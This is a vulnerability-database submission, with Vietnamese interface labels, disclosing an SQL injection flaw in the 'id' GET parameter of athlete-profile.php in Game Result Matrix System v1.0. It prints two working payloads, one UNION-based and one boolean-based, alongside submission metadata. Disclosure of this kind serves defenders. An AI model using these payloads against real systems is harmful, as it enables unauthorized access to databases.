| tiêu đề | Game Result Matrix System v1.0 /dipam/athlete-profile.php GET parameter id exists SQL injection vulnerability |
|---|
| Mô tả | Game Result Matrix System v1.0 has SQL injection vulnerability.
Vulnerability File: /dipam/athlete-profile.php
GET parameter id exists SQL injection vulnerability.
Payload1: id=-1' union all select null,null,null,null,null,null,null,null,null,concat(0x56575859,0x60616263),null,null,null-- -
UNION query successful.
Payload2: id=243' AND 123=123 AND 'qwe'='qwe
The Boolean value is judged correctly, so the page is displayed normally. |
|---|
| Nguồn | ⚠️ https://github.com/M9KJ-TEAM/CVEReport/blob/main/SQL2.md |
|---|
| Người dùng | zhangyf (UID 48462) |
|---|
| Đệ trình | 21/06/2023 12:17 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 23/06/2023 11:19 (2 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 232239 [SourceCodester Game Result Matrix System 1.0 GET Parameter athlete-profile.php ID Tiêm SQL] |
|---|
| điểm | 20 |
|---|